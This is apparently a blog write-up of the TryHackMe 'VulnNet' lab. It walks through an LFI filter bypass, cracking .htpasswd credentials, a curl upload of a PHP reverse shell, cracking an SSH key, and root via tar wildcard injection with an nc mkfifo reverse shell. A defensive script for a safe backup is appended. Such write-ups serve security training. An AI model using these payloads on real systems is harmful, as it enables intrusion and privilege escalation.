CREATE & DESTROY

VulnNet | TryHackMe

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Those are the initial nmap results; let’s head to the web server…

In one of the JavaScript files we find a reference to http://broadcast.vulnnet.net, so let’s add that to /etc/hosts and see what’s there.

We get thwacked with an HTTP Basic authentication prompt, and it doesn’t look easy to bypass. We’ll return to the main web server and see what else we can find first.


The other JavaScript file we can read references a reachable PHP URL. Fuzzing it with ffuf and an LFI wordlist shows the endpoint is vulnerable to local file inclusion; a basic traversal filter bypass (…//…//) is all we need to dump /etc/passwd.

The only user with a shell is server-management, and there are no SSH keys for that user we can grab. We can’t find readable Apache access logs to poison, but we can read the .htpasswd file and see whether it gives us credentials for the subdomain’s authentication…

We grab the username developers and the MD5 hash, so let’s try to crack it.

There we go: developers:9972761drmfsls are our creds. Let’s try them on the login form we saw earlier.

Exploit-DB has an entry for an unauthenticated file upload in one of the application’s modules, so we’ll try uploading a PHP reverse shell…

curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" \
  'http://broadcast.vulnnet.thm/actions/beats_uploader.php' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Authorization: Basic ZGV2ZWxvcGVyczo5OTcyNzYxZHJtZnNscw=='

The uploader renames the files it accepts, but visiting http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR gives us a directory listing anyway, so we can start our listener, request the uploaded file, and pop a shell!

We find /var/backups/ssh-backup.tar.gz, owned by the user server-management, so we copy it to /tmp and extract it.
The SSH key inside requires a passphrase, so we run it through ssh2john and see whether we can crack the hash…

With that we can kill our www-data shell and settle into a comfortable SSH session.

We find a script owned by root that regularly backs up our Documents folder. Its tar command uses a wildcard, so we can exploit that easily.

server-management@vulnnet:/tmp$ cat /var/opt/backupsrv.sh
# Where to backup to.
# What to backup.
cd /home/server-management/Documents

Moving to our home directory, we create the following files:

touch '--checkpoint=1'
touch '--checkpoint-action=exec=sh shell.sh'

and finally a quick mkfifo reverse shell in shell.sh:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 1234 >/tmp/f

All that’s left to do is open another listener and wait for a call…

There’s our shell, and our root flag.
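As an added example that is not part of the writeup or the room, here is how the backup above could be written so that a wildcard never turns a filename into a tar option, together with a check an administrator can run to flag names that start with a dash. The demo builds a throwaway Documents directory containing the two filenames above and a shell.sh that only creates a marker file; those paths are constructed, and the room’s real tar line is not reproduced.

```shell
#!/bin/sh
# Added example, not the room's /var/opt/backupsrv.sh or the author's code.
# Shows a wildcard-safe way to write that backup plus a check that flags
# option-like filenames in a directory. All paths here are constructed.

# Return 1 (and print each hit) if any entry in $1 has a name starting with
# '-'. Such a name becomes an option if a wildcard hands it to tar.
find_option_like_names() {
    dir="$1"; found=0
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue
        case "${f##*/}" in
            -*) printf 'suspicious filename: %s\n' "$f"; found=1 ;;
        esac
    done
    return "$found"
}

# Archive $1 into $2 without any filename reaching tar's argument list:
# -C enters the directory and '.' is the only path, so a file named
# '--checkpoint-action=exec=...' is stored as data, never parsed as an option.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# Stand-alone demo: a Documents directory holding the two filenames from the
# writeup and a harmless shell.sh that only drops a marker file, backed up
# with safe_backup. The marker stays absent, showing nothing was executed.
demo() {
    work=$(mktemp -d)
    mkdir "$work/Documents"
    : > "$work/Documents/notes.txt"
    : > "$work/Documents/--checkpoint=1"
    : > "$work/Documents/--checkpoint-action=exec=sh shell.sh"
    printf 'touch "%s/EXECUTED"\n' "$work" > "$work/Documents/shell.sh"
    find_option_like_names "$work/Documents" || echo "audit: option-like names found"
    safe_backup "$work/Documents" "$work/backup.tar"
    echo "archive holds $(tar -tf "$work/backup.tar" | wc -l) entries"
    if [ -e "$work/EXECUTED" ]; then echo "shell.sh ran"; else echo "shell.sh did not run"; fi
    rm -rf "$work"
}

demo
```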

This was a nice room, with multiple not-too-complicated layers to getting a foothold.
